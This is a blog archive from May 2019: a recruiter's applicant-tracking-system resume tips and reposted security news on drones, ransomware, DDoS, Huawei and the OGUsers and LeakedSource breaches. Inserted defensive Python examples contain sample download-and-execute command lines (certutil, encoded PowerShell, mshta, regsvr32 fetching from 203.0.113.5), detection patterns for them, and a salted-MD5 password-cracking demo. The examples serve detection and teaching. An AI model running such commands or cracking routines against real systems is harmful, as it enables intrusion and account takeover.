Archive for May 2019

Hacking the Applicant Tracking System: Resume Tips to Get Your Resume Found

Follow these 5 Applicant Tracking System resume tips to make sure your InfoSec resume doesn’t automatically get kicked out of the screening process

Dear ‘FirstName’ Unknown ‘LastName’ Unknown,

I am a recruiter. Today I spent hours sourcing from one of the many career websites and resume databases on which you carefully created a profile and uploaded your resume. I read the profiles and built the perfect candidate pool of job seekers I wanted to target. I downloaded the resumes from the database and, for HR compliance, uploaded them to my Applicant Tracking System (ATS). To my dismay, this step usually results in 50% of the resumes being unreadable, and you, my favorite candidate, are now “Unknown Unknown”. I researched what was happening and found one common thread among these sourced candidates. The top of their resumes stated:

– Note: This is a converted Word document. An image of the resume is displayed rather than text.

Keep in mind that most companies now use an ATS to meet HR compliance requirements and to handle the hundreds of applicants they receive on most job postings; recruiters generally upload their sourced resumes to these systems for the same reason. The ATS parses each resume and compares the extracted data against the criteria in the job posting through keywords, screening questions, and so on. Most resumes are only seen by a human if they were actually sourced or if they pass the initial screening, which is done solely by the computer.

Unfortunately, if you are one of the InfoSec folks who have converted your resume to an image, it will be lost once the recruiter uploads it to the ATS, or it will fail most initial ATS screenings. Usually this means you will automatically receive a rejection letter from the system once the final selection is made. Here is why: most resume parsers in ATS systems have no optical character recognition (OCR) capability, so a resume stored as an image is simply unreadable to them.

InfoSec Connect wants to help you modify your resume to ensure you are being considered based on your skill set and not your resume format. Algorithms designed to screen resumes are systematic and minor things can kick your resume out of consideration. The rules are simple:

  • DO NOT convert your resume to an image
  • DO NOT put your name and contact information in the document header
  • DO keep your resume format simple: avoid advanced formatting such as tables, unusual fonts, and images
  • DO clearly label the resume sections with standardized headings (best to reuse the headings from postings, such as Qualifications, Experience, etc.)
  • DO use the keywords you identified in the job posting; keep in mind that most ATS systems rely on simple keyword matching, much like outdated SEO methods, for the initial screening

Now go update that resume and get past those initial screenings!

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according to an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, for which the primary manufacturer is DJI, based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Source: Information Security Magazine

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools already installed on targeted systems to carry out attacks, the living-off-the-land pattern: because the binaries are legitimate, detection has to key on how they are invoked rather than on their presence.
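As an added illustration of that point (this is example code, not from the Fortinet report or the original article), the script below runs a small set of invocation-based rules over constructed process-creation events. The log format, the sample events, the list of dual-use binaries and the patterns flagged for each are all assumptions made for the example; a real deployment would map them onto Sysmon or EDR process telemetry and tune them against the environment's own administrative use. It also decodes PowerShell `-enc` payloads so the analyst sees the script rather than the base64 blob.

```python
"""Flag living-off-the-land use of dual-use binaries in process-creation telemetry.

Added example; neither the rules nor the log lines come from the Fortinet report.
The log format, the sample events and the rule list are all constructed here and
would be adapted to real telemetry (Sysmon event ID 1, EDR process events, and so on).
"""
import base64
import re
from dataclasses import dataclass

# Constructed sample events: time|host|user|parent image|image path|command line
SAMPLE_LOG = """\
2019-05-20T09:12:01Z|ws01|alice|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
2019-05-20T09:14:33Z|ws01|alice|winword.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c start.bat
2019-05-20T09:14:34Z|ws01|alice|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://203.0.113.5/x.txt C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe
2019-05-20T09:14:35Z|ws01|alice|cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AKQA
2019-05-20T09:20:10Z|srv02|svc_backup|services.exe|C:\\Windows\\System32\\certutil.exe|certutil -verify C:\\certs\\server.pem
2019-05-20T09:25:44Z|ws03|bob|cmd.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe http://203.0.113.5/a.hta
2019-05-20T09:26:02Z|ws03|bob|cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32 /s /n /u /i:http://203.0.113.5/s.sct scrobj.dll
"""

# This example's own rule set: dual-use binary -> patterns over its command line
# that rarely appear in legitimate administrative use.
LOLBIN_RULES = {
    "certutil.exe": [r"-urlcache", r"-decode\b", r"-encode\b"],
    "powershell.exe": [r"-e(nc|ncodedcommand)?\b", r"-nop\b", r"-w(indowstyle)?\s+hidden",
                       r"downloadstring", r"\biex\b"],
    "mshta.exe": [r"https?://", r"(javascript|vbscript):"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"(javascript|vbscript):", r"https?://"],
    "bitsadmin.exe": [r"/transfer\b"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
}
# An Office application spawning a shell is a classic macro-delivery sign.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Finding:
    time: str
    host: str
    user: str
    image: str
    reasons: list
    decoded: str  # plaintext of a -enc payload, if one was present


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script behind PowerShell -enc/-EncodedCommand (base64 of UTF-16LE)."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def analyze(log_text: str) -> list:
    """Return one Finding per event that trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        time, host, user, parent, image, cmdline = line.split("|", 5)
        exe = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
        parent = parent.lower()
        reasons = [f"{exe} matches /{p}/" for p in LOLBIN_RULES.get(exe, [])
                   if re.search(p, cmdline, re.I)]
        if parent in OFFICE_PARENTS and exe in SHELLS:
            reasons.append(f"{parent} spawned {exe}")
        if reasons:
            findings.append(Finding(time, host, user, exe, reasons, decode_encoded_command(cmdline)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f.time, f.host, f.user, f.image, "; ".join(f.reasons))
        if f.decoded:
            print("    decoded:", f.decoded)
```

Of the seven constructed events, the benign notepad launch and the legitimate `certutil -verify` pass through; the other five are flagged, and the `-enc` payload is shown decoded so the download cradle is visible at triage time.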

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.
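The two measurements the report describes, the share of threats that reuse someone else's domain and whether a reused domain stays within one kill-chain stage, are easy to compute from a threat-intel indicator set. The script below does that over a constructed indicator list and also clusters threats that are linked through shared domains, which is the pivot an analyst makes when an incident turns up one known domain. This is an added example, not code from Fortinet or from the article; the indicators, the threat names and the stage labels are all invented for it.

```python
"""Measure infrastructure sharing between threats, by kill-chain stage.

Added example, not from the Fortinet report: the indicator list is constructed,
and the stage labels (delivery, exploitation, c2) are this example's own.
"""
from collections import defaultdict

# Constructed indicators: (threat, kill-chain stage, domain)
INDICATORS = [
    ("ThreatA", "delivery", "cdn-files.example"),
    ("ThreatA", "c2", "api-sync.example"),
    ("ThreatB", "delivery", "cdn-files.example"),     # borrows A's delivery host
    ("ThreatB", "c2", "beacon-1.example"),
    ("ThreatC", "exploitation", "landing-kit.example"),
    ("ThreatC", "c2", "api-sync.example"),            # borrows A's C2 host
    ("ThreatD", "exploitation", "landing-kit.example"),
    ("ThreatD", "c2", "landing-kit.example"),         # same domain reused at a later stage
    ("ThreatE", "delivery", "solo-drop.example"),
    ("ThreatE", "c2", "solo-beacon.example"),
]


def index_by_domain(indicators):
    """domain -> {"threats": set of threat names, "stages": set of stages}"""
    idx = defaultdict(lambda: {"threats": set(), "stages": set()})
    for threat, stage, domain in indicators:
        idx[domain]["threats"].add(threat)
        idx[domain]["stages"].add(stage)
    return idx


def shared_domains(indicators):
    """Domains seen in more than one threat: the 'why build when you can borrow' set."""
    return {d: sorted(v["threats"]) for d, v in index_by_domain(indicators).items()
            if len(v["threats"]) > 1}


def sharing_rate(indicators):
    """Fraction of threats that share at least one domain with another threat."""
    threats = {t for t, _, _ in indicators}
    sharing = {t for ts in shared_domains(indicators).values() for t in ts}
    return len(sharing) / len(threats) if threats else 0.0


def cross_stage_domains(indicators):
    """Domains used at more than one stage; the report calls this unusual, so flag it."""
    return {d: sorted(v["stages"]) for d, v in index_by_domain(indicators).items()
            if len(v["stages"]) > 1}


def clusters(indicators):
    """Group threats connected, transitively, through shared domains (union-find)."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for t, _, _ in indicators:
        find(t)
    for ts in shared_domains(indicators).values():
        root = find(ts[0])
        for t in ts[1:]:
            parent[find(t)] = root
    groups = defaultdict(set)
    for t in parent:
        groups[find(t)].add(t)
    return sorted(groups.values(), key=lambda g: (-len(g), sorted(g)))


if __name__ == "__main__":
    print(f"sharing rate: {sharing_rate(INDICATORS):.0%}")
    print("shared:", shared_domains(INDICATORS))
    print("cross-stage:", cross_stage_domains(INDICATORS))
    print("clusters:", clusters(INDICATORS))
```

On the constructed set, four of five threats share a domain, only `landing-kit.example` appears at two stages, and the sharing links ThreatA through ThreatD into one cluster while ThreatE stands alone; on real data the cross-stage list is the one to review by hand, since the report's finding is that such reuse is rare.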

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Source: Information Security Magazine

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies: only about a quarter of organizations report using it for data at rest, for email, and in their data centers.

According to research by Thales and IDC, email encryption is adopted by only around 27% of the European respondents they recently surveyed, and the figures are lower still for data at rest, data centers, Big Data environments and full disk encryption. The only area where European respondents ranked above the global figure was use of cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now traverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.”

Source: Information Security Magazine

DDoS Attacks on the Rise After Long Period of Decline

The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered substantial growth in the number of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Lab’s advice for DDoS attack defense included:

  • Ensuring that web and IT resources can handle high traffic
  • Using professional solutions to protect the organization against attacks

Source: Information Security Magazine

Washington Issues Temporary License to Huawei

The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on the Commerce Department’s Entity List last week, the department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19, 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Source: Information Security Magazine

Ecuador Shares Assange's Legal Docs with US

Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuador officials also refused a request by UN special rapporteur on privacy, who requested permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

Source: Information Security Magazine

New South Wales Announces New Cybersecurity Position

In an attempt to centralize all of the state’s cyber efforts and strategies, New South Wales (NSW) has announced a new Cybersecurity NSW office, to be led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Source: Information Security Magazine

Online Account Hijacker Forum OGUsers Hacked

An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

An attack on OGUsers.com leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP addresses.

The RaidForums administrator, Omnipotent, announced to forum members that he had made the OGUsers forum database available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum ogusers.com was breached; 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5, which surprised me. Anyway, the website owner has acknowledged data corruption but not a breach, so I guess I'm the first to tell you the truth: view his statement here, or if you don't want to visit their website, view it here. According to his statement he didn't have any recent backups, so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the OGUsers.com forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”
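The detail that the passwords were “salted MD5” matters for anyone assessing the fallout. A per-user salt stops an attacker from cracking every account with one precomputed table, but MD5 is so fast that guessing each user's password individually remains cheap; what actually slows an offline attack is a deliberately expensive, tunable KDF. The script below makes that concrete: it cracks a constructed salted-MD5 dump with a short wordlist and then compares the per-guess cost against PBKDF2-HMAC-SHA256. This is an added example, not code from Krebs, the forum, or the article; the `md5(salt + password)` layout, the sample users, their passwords and the wordlist are all assumptions made for the demonstration, not the forum's actual scheme or data.

```python
"""Why 'salted MD5' did not protect the leaked passwords, and what would have.

Added example; the dump below is constructed from assumed passwords and the
md5(salt + password) layout is an assumption, not the forum's actual scheme.
A salt defeats precomputed tables, but MD5 is so fast that per-user guessing
stays cheap; a deliberately slow KDF (PBKDF2 here) is what makes guessing costly.
"""
import hashlib
import hmac
import os
import time


def salted_md5(password: str, salt: str) -> str:
    """One fast MD5 per guess; the salt only stops sharing work across users."""
    return hashlib.md5((salt + password).encode()).hexdigest()


# Constructed dump: (user, salt, digest) built from assumed passwords.
ASSUMED_PASSWORDS = {"alice": "password1", "bob": "Summer2019", "carol": "x7#Qm!2pLw9"}
SAMPLE_DUMP = [(user, f"s{i:02d}", salted_md5(pw, f"s{i:02d}"))
               for i, (user, pw) in enumerate(ASSUMED_PASSWORDS.items())]
WORDLIST = ["123456", "password", "password1", "letmein", "Summer2019", "qwerty"]


def crack_salted_md5(dump, wordlist) -> dict:
    """Per-user dictionary attack; each guess costs exactly one MD5 call."""
    cracked = {}
    for user, salt, digest in dump:
        for guess in wordlist:
            if hmac.compare_digest(salted_md5(guess, salt), digest):
                cracked[user] = guess
                break
    return cracked


def pbkdf2_hash(password: str, salt: bytes = None, iterations: int = 100_000) -> str:
    """Slow, tunable hash, stored as iterations$salt$digest so the cost can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Re-derive with the stored parameters and compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), digest_hex)


def guesses_per_second(hash_fn, seconds: float = 0.2) -> float:
    """Rough single-core guess rate for a hash function taking (password, salt_str)."""
    n, start = 0, time.perf_counter()
    end = start + seconds
    while time.perf_counter() < end:
        hash_fn(f"guess{n}", "s00")
        n += 1
    return n / (time.perf_counter() - start)


def cost_ratio() -> float:
    """How many salted-MD5 guesses fit in the time of one PBKDF2 guess (100k iterations)."""
    fast = guesses_per_second(salted_md5)
    slow = guesses_per_second(lambda pw, s: pbkdf2_hash(pw, s.encode()))
    return fast / slow


if __name__ == "__main__":
    print("cracked:", crack_salted_md5(SAMPLE_DUMP, WORDLIST))
    print(f"MD5 guesses per PBKDF2 guess: {cost_ratio():,.0f}")
```

Two of the three constructed accounts fall to a six-word list; `carol`, with a password outside the list, survives only because of password strength, not because of the hash. The PBKDF2 ratio is the point: the same wordlist costs the attacker tens of thousands of times more per user, and the iteration count stored with each hash can be raised as hardware improves.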

Source: Information Security Magazine

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottawa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Source: Information Security Magazine